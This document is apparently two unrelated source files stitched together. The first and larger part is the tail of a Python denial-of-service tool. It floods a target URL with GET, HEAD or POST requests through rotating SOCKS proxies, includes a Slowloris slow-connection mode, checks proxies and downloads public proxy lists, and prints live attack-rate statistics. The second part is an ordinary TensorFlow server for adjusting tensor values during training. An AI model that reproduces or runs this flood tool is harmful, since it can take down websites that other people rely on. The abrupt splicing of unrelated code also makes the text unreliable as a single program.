i = 0
print("{:^70}".format("Proxies attacking status"))
print("{:^70}".format("IP:PORT <-> RPS "))
#1. xxx.xxx.xxx.xxx:xxxxx ==> Rps: xxxx
ind_rlock.acquire()
top_num = 0
top10= sorted(ind_dict, key=ind_dict.get, reverse=True)
if len(top10) > 10:
top_num = 10
else:
top_num = len(top10)
for num in range(top_num):
top = "none"
rps = 0
if len(ind_dict) != 0:
top = top10[num]
rps = ind_dict[top]
ind_dict[top] = 0
print("{:^70}".format("{:2d}. {:^22s} | Rps: {:d}".format(num+1,top,rps)))
total = 0
for k,v in ind_dict.items():
total = total + v
ind_dict[k] = 0
ind_rlock.release()
print("{:^70}".format(" ["+sp_char[i]+"] CC attack | Total Rps:"+str(total)))
i+=1
time.sleep(1)
print("\n"*100)
def cc(event,socks_type,ind_rlock):
global ind_dict
header = GenReqHeader("get")
proxy = Choice(proxies).strip().split(":")
add = "?"
if "?" in path:
add = "&"
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
try:
for n in range(multiple+1):
get_host = "GET " + path + add + randomurl() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
sent = s.send(str.encode(request))
if not sent:
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += n
ind_rlock.release()
proxy = Choice(proxies).strip().split(":")
break
s.close()
except:
s.close()
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1
ind_rlock.release()
except:
s.close()
def head(event,socks_type,ind_rlock):#HEAD MODE
global ind_dict
header = GenReqHeader("head")
proxy = Choice(proxies).strip().split(":")
add = "?"
if "?" in path:
add = "&"
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
try:
for n in range(multiple+1):
head_host = "HEAD " + path + add + randomurl() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = head_host + header
sent = s.send(str.encode(request))
if not sent:
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += n
ind_rlock.release()
proxy = Choice(proxies).strip().split(":")
break# This part will jump to dirty fix
s.close()
except:
s.close()
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1
ind_rlock.release()
except:#dirty fix
s.close()
def post(event,socks_type,ind_rlock):
global ind_dict
request = GenReqHeader("post")
proxy = Choice(proxies).strip().split(":")
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
try:
for n in range(multiple+1):
sent = s.send(str.encode(request))
if not sent:
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += n
ind_rlock.release()
proxy = Choice(proxies).strip().split(":")
break
s.close()
except:
s.close()
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1
ind_rlock.release()
except:
s.close()
socket_list=[]
def slow(conn,socks_type):
proxy = Choice(proxies).strip().split(":")
for _ in range(conn):
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.settimeout(1)
s.connect((str(target), int(port)))
if str(port) == '443':
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header
s.send("User-Agent: {}\r\n".format(getuseragent()).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
if cookies != "":
s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8"))
s.send(("Connection:keep-alive").encode("utf-8"))
socket_list.append(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
s.close()
proxy = Choice(proxies).strip().split(":")#Only change proxy when error, increase the performance
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
while True:
for s in list(socket_list):
try:
s.send("X-a: {}\r\n".format(Intn(1, 5000)).encode("utf-8"))
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
s.close()
socket_list.remove(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
proxy = Choice(proxies).strip().split(":")
for _ in range(conn - len(socket_list)):
try:
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.settimeout(1)
s.connect((str(target), int(port)))
if int(port) == 443:
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header
s.send("User-Agent: {}\r\n".format(getuseragent).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
if cookies != "":
s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8"))
s.send(("Connection:keep-alive").encode("utf-8"))
socket_list.append(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
proxy = Choice(proxies).strip().split(":")
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
pass
nums = 0
def checking(lines,socks_type,ms,rlock,):#Proxy checker coded by Leeon123
global nums
global proxies
proxy = lines.strip().split(":")
if len(proxy) != 2:
rlock.acquire()
proxies.remove(lines)
rlock.release()
return
err = 0
while True:
if err >= 3:
rlock.acquire()
proxies.remove(lines)
rlock.release()
break
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.settimeout(ms)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
sent = s.send(str.encode("GET / HTTP/1.1\r\n\r\n"))
if not sent:
err += 1
s.close()
break
except:
err +=1
nums += 1
def check_socks(ms):#Coded by Leeon123
global nums
thread_list=[]
rlock = threading.RLock()
for lines in list(proxies):
if choice == "5":
th = threading.Thread(target=checking,args=(lines,5,ms,rlock,))
th.start()
if choice == "4":
th = threading.Thread(target=checking,args=(lines,4,ms,rlock,))
th.start()
thread_list.append(th)
time.sleep(0.01)
sys.stdout.write("> Checked "+str(nums)+" proxies\r")
sys.stdout.flush()
for th in list(thread_list):
th.join()
sys.stdout.write("> Checked "+str(nums)+" proxies\r")
sys.stdout.flush()
print("\r\n> Checked all proxies, Total Worked:"+str(len(proxies)))
ans = input("> Do u want to save them in a file? (y/n, default=y)")
if ans == "y" or ans == "":
if choice == "4":
with open("socks4.txt", 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines,encoding='utf8'))
fp.close()
print("> They are saved in socks4.txt.")
elif choice == "5":
with open("socks5.txt", 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines,encoding='utf8'))
fp.close()
print("> They are saved in socks5.txt.")
def check_list(socks_file):
print("> Checking list")
temp = open(socks_file).readlines()
temp_list = []
for i in temp:
if i not in temp_list:
if ':' in i:
temp_list.append(i)
rfile = open(socks_file, "wb")
for i in list(temp_list):
rfile.write(bytes(i,encoding='utf-8'))
rfile.close()
def downloadsocks(choice):
if choice == "4":
f = open("socks4.txt",'wb')
try:
r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&country=all",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks4",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxyscan.io/download?type=socks4",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks4.txt",timeout=5)
f.write(r.content)
f.close()
except:
f.close()
try:#credit to All3xJ
r = requests.get("https://www.socks-proxy.net/",timeout=5)
part = str(r.content)
part = part.split("<tbody>")
part = part[1].split("</tbody>")
part = part[0].split("<tr><td>")
proxies = ""
for proxy in part:
proxy = proxy.split("</td><td>")
try:
proxies=proxies + proxy[0] + ":" + proxy[1] + "\n"
except:
pass
out_file = open("socks4.txt","a")
out_file.write(proxies)
out_file.close()
except:
pass
print("> Have already downloaded socks4 list as socks4.txt")
if choice == "5":
f = open("socks5.txt",'wb')
try:
r = requests.get("https://api.proxyscrape.com/v2/?request=getproxies&protocol=socks5&timeout=10000&country=all&simplified=true",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks5",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxyscan.io/download?type=socks5",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks5.txt",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/hookzof/socks5_list/master/proxy.txt",timeout=5)
f.write(r.content)
f.close()
except:
f.close()
print("> Have already downloaded socks5 list as socks5.txt")
def prevent():
if '.gov' in url:
print("> You can't attack .gov websites!")
exit()
def main():
global multiple
global choice
global data
global mode2
global cookies
global brute
global url
print("> Mode: [cc/post/head/slow/check]")
mode = InputOption("> Choose Your Mode (default=cc) :",["cc","post","head","slow","check"],"cc")
url = str(input("> Input the target url:")).strip()
prevent()
ParseUrl(url)
if mode == "post":
mode2 = InputOption("> Customize post data? (y/n, default=n):",["y","n","yes","no"],"n")
if mode2 == "y":
data = open(str(input("> Input the file's path:")).strip(),"r",encoding="utf-8", errors='ignore').readlines()
data = ' '.join([str(txt) for txt in data])
choice2 = InputOption("> Customize cookies? (y/n, default=n):",["y","n","yes","no"],"n")
if choice2 == "y":
cookies = str(input("Plese input the cookies:")).strip()
choice = InputOption("> Choose your socks mode(4/5, default=5):",["4","5"],"5")
if choice == "4":
socks_type = 4
else:
socks_type = 5
if mode == "check":
CheckerOption()
print("> End of process")
return
if mode == "slow":
thread_num = str(input("> Connections(default=400):"))
else:
thread_num = str(input("> Threads(default=400):"))
if thread_num == "":
thread_num = int(400)
else:
try:
thread_num = int(thread_num)
except:
sys.exit("Error thread number")
CheckerOption()
if len(proxies) == 0:
print("> There are no more proxies. Please download a new one.")
return
ind_rlock = threading.RLock()
if mode == "slow":
input("Press Enter to continue.")
th = threading.Thread(target=slow,args=(thread_num,socks_type,))
th.daemon = True
th.start()
else:
multiple = str(input("> Input the Magnification(default=100):"))
if multiple == "":
multiple = int(100)
else:
multiple = int(multiple)
brute = str(input("> Enable boost mode[beta](y/n, default=n):"))
if brute == "":
brute = False
elif brute == "y":
brute = True
elif brute == "n":
brute = False
event = threading.Event()
print("> Building threads...")
SetupIndDict()
build_threads(mode,thread_num,event,socks_type,ind_rlock)
event.clear()
input("Press Enter to continue.")
event.set()
threading.Thread(target=OutputToScreen,args=(ind_rlock,),daemon=True).start()
while True:
try:
time.sleep(0.1)
except KeyboardInterrupt:
break
if __name__ == "__main__":
main()#Coded by ViRu
|
server.py
|
from http.server import BaseHTTPRequestHandler, HTTPServer
import multiprocessing, urllib, json, threading
import tensorflow as tf
class SessionServer(HTTPServer):
def __init__(self, tensors, session, address="127.0.0.1", port=8084, assign_ops=None, placeholders=None):
"""
Session Server allows Tensor values to be changed while training.
:param tensors: List of Tensors that can be interactively changed.
:param session: Tensorflow session to use.
:param address: Server address.
:param port: Server port.
:param assign_ops Ops that assign values to Tensors. Used in distributed training.
:param placeholders Placeholders for assign ops. Used in distributed training.
:return: None.
"""
super().__init__((address, port), self.RequestHandler)
self.tensors = tensors
self.assign_ops = assign_ops
self.placeholders = placeholders
if not ((assign_ops is None and placeholders is None) or (assign_ops is not None and placeholders is not None)):
raise ValueError("Either specify both assign_ops and placeholders or none.")
self.session = session
manager = multiprocessing.Manager()
self.shared = manager.dict()
self.shared["tensor_names"] = [tensor.name for tensor in tensors]
tensor_dtypes = []
for tensor in tensors:
if tensor.dtype == tf.string or tensor.dtype.name == "string_ref":
tensor_dtypes.append(str)
else:
np_dtype = tensor.dtype.as_numpy_dtype
tensor_dtypes.append(type(np_dtype(0).item()))
self.shared["tensor_dtypes"] = tensor_dtypes
self.shared["last_check_iteration"] = 0
self.events = manager.list()
self.past_events = manager.list()
def check_events(self, iteration):
"""
Check if some event should be triggered.
:param iteration: Current training iteration (global step).
:return: None.
"""
# remember when we last checked
self.shared["last_check_iteration"] = iteration
# check if any event is triggered
events_to_delete = []
for event in sorted(self.events, key=lambda x: x["iteration"], reverse=True):
if event["iteration"] <= iteration:
self.assign_value(event["tensor_name"], event["value"])
events_to_delete.append(self.events.index(event))
for event_idx in sorted(events_to_delete, reverse=True):
self.past_events.append(self.events[event_idx])
del self.events[event_idx]
def assign_value(self, tensor_name, value):
"""
Assign new value to a Tensor.
:param tensor_name: Name of the Tensor to be changed.
:param value: New value for the Tensor.
:return: None.
"""
tensor_index = self.shared["tensor_names"].index(tensor_name)
tensor = self.tensors[tensor_index]
if self.assign_ops is None:
self.session.run(tensor.assign(value))
else:
self.session.run(self.assign_ops[tensor_index], feed_dict={
self.placeholders[tensor_index]: value
})
class RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
"""
Handle a GET request - should return the list of events and other info.
"""
# events and past_events are a ListProxy that isn't JSON serializable => convert it to Python list
json_obj = {
"events": [x for x in self.server.events],
"past_events": [x for x in self.server.past_events],
"tensor_names": self.server.shared["tensor_names"],
"last_check_iteration": int(self.server.shared["last_check_iteration"])
}
json_string = json.dumps(json_obj).encode()
self.send_response(200)
self.end_headers()
self.wfile.write(json_string)
def do_POST(self):
"""
Handle a POST request - add new event.
"""
length = int(self.headers['Content-Length'])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
error = False
iteration = None
tensor_name = None
value = None
if "iteration" in post_data and "tensor_name" in post_data and "value" in post_data:
try:
iteration = int(post_data["iteration"][0])
tensor_name = post_data["tensor_name"][0]
if tensor_name in self.server.shared["tensor_names"]:
tensor_index = self.server.shared["tensor_names"].index(tensor_name)
tensor_dtype = self.server.shared["tensor_dtypes"][tensor_index]
value = post_data["value"][0]
value = tensor_dtype(value)
else:
error = True
except ValueError:
error = True
else:
error = True
if not error:
self.add_event(iteration, tensor_name, value)
self.send_response_only(200)
else:
self.send_error(400, "Invalid add event request.")
self.end_headers()
def do_DELETE(self):
"""
Handle a DELETE request - remove an event.
"""
length = int(self.headers['Content-Length'])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
error = False
event_idx = None
if "event_idx" in post_data:
event_idx = int(post_data["event_idx"][0])
if event_idx >= len(self.server.events):
error = True
else:
error = True
if not error:
del self.server.events[event_idx]
self.send_response_only(200)
else:
self.send_error(400, "Invalid delete event request.")
self.end_headers()
def add_event(self, iteration, tensor_name, value):
"""
Register an event.
:param iteration: When to trigger the event.
:param tensor_name: Which Tensor to change.
:param value: Value for the Tensor.
:return: None.
"""
self.server.events.append({
"iteration": iteration, "tensor_name": tensor_name, "value": value
})
def log_message(self, format, *args):
return
def run_server(tensors, session, address="127.0.0.1", port=8084, assign_ops=None, placeholders=None):
"""
Run a SessionServer.
:param tensors: Tensors to register.
:param session: Current Tensorflow session.
:param address: Server address.
:param port: Server port.
:param assign_ops: Ops that assign values to Tensors. Used in distributed training.
:param placeholders: Placeholders for assign ops. Used in distributed training.
:return: Tuple of the server object and its thread.
"""
httpd = SessionServer(tensors, session, address=address, port=port, assign_ops=assign_ops, placeholders=placeholders)
def worker(server):
server.serve_forever()
thread = threading.Thread(target=worker, args=(httpd,), daemon=True)
thread.start()
return httpd, thread
|